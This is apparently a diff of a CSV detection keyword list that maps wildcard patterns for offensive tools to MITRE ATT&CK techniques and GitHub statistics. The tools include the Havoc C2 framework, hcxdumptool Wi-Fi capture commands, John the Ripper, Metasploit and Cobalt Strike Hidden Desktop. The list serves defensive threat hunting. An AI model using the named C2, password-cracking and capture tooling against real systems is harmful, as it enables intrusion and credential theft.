T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*hatlord/snmpwn*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" -"*havoc client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*havoc server*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc.agent*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc.git*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc.service*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/Client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/cmd/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/payloads*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/pkg*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Havoc/Teamserver*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_agent.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_agent_talon.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_default.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_externalc2*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc_service_connect*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc-c2-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havoc-c2-data*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*havocframework.com*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocService*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocTalonInteract*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocUi.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocUi.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*HavocUI.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*hccapx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*hci_oracle_passwords*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*havoc client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*havoc server*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.agent*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc.git*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.service*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/Client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/cmd/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/payloads*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/pkg*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/Teamserver*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_agent.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_agent_talon.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_default.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_externalc2*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_service_connect*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc-c2-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc-c2-data*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havocframework.com*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocService*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocTalonInteract*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUi.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUi.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUI.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*hccapx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*hci_oracle_passwords*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*hcxdumptool*","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1553","374","2023-10-02T15:51:15Z","2018-02-25T08:18:40Z" +"*hcxdumptool*","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1555","374","2023-10-02T15:51:15Z","2018-02-25T08:18:40Z" "*hcxhashtool -i *.hashcat --info stdout*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hcxpcapngtool --all -o *.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hcxpcapngtool -o *.hashcat *.pcapng*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*hd-launch-cmd *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - 